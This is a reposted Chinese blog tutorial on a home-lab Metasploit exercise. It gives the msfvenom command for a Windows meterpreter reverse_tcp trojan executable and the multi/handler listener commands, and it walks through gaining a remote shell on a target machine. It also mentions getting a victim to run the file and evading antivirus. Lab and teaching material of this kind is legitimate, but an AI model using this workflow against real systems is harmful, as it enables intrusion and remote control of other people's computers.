Tips:转载自作者TedLau_R
前段时间学了msf的一些基础知识,正好有时间了,在本地搭建好了环境,准备练练手。(Tips:请勿用作非法用途,仅供学术交流)
那么首先先介绍一下msf吧
Metasploit Framework (MSF)是2003 年以开放源代码方式发布、可自由获取的开发框架,这个环境为xx测试、shellcode 编写和漏洞研究提供了一个可靠的平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,最新版本的MSF 包含了180多种当前流行的操作系统和应用软件的exploit,以及100多 个shellcode。作为安全工具,它在安全检测中起到不容忽视的作用,并为漏洞自动化探测和及时检测系统漏洞提供有力的保障。

IP地址

kali:192.168.83.128
靶机:192.168.83.129

step1-生成Trojan horse

今天需要使用到msfvenom来生成Trojan horse。
基础用法
-p, --payload 使用Trojan horse负荷。指定一个'-'或者输入(stdin)用户自定义的payloads(Trojan horse负荷)。
-f, --format 输出格式(使用 --help-formats来查看变量格式列表)
-o,--out 保存***负荷(payload)
在此次实验中命令为:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.83.128 LPORT=4444 -f exe -o payload.exe
这里的LHOST为kali的IP,LPORT自然为kali的端口。
利用kali下的msf Intrusion靶机_第1张图片
ok,生成成功。

step2-将Trojan horse传入到靶机

这一步就要靠自己的技巧了,而在这里我是在本地进行试验(ps:自行试验时目标主机必须得关闭安全防护比如防火墙,360等等,如果没关,则需要对Trojan horse进行免杀处理,Trojan horse才能成功运行)
利用kali下的msf Intrusion靶机_第2张图片

step3-使用msf侦听

利用kali下的msf Intrusion靶机_第3张图片
use exploit/mulit/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.83.128 //kali的ip
set LPORT 4444 //kali的端口
run

step4-运行Trojan horse

这一步是通过你自己的技术,使对方运行你的Trojan horse,由于我是在本地试验,就不赘述了。

step5-获取shell

当对方成功运行Trojan horse之后,就会反弹一个shell。
利用kali下的msf Intrusion靶机_第4张图片
在meterpreter后输入shell即可获取目标靶机的一个shell
(类似于cmd,可以执行系统命令)
利用kali下的msf Intrusion靶机_第5张图片
本次试验到此结束,再次提醒请勿用作非法用途,如有表达不周,烦请不吝赐教。非常感谢!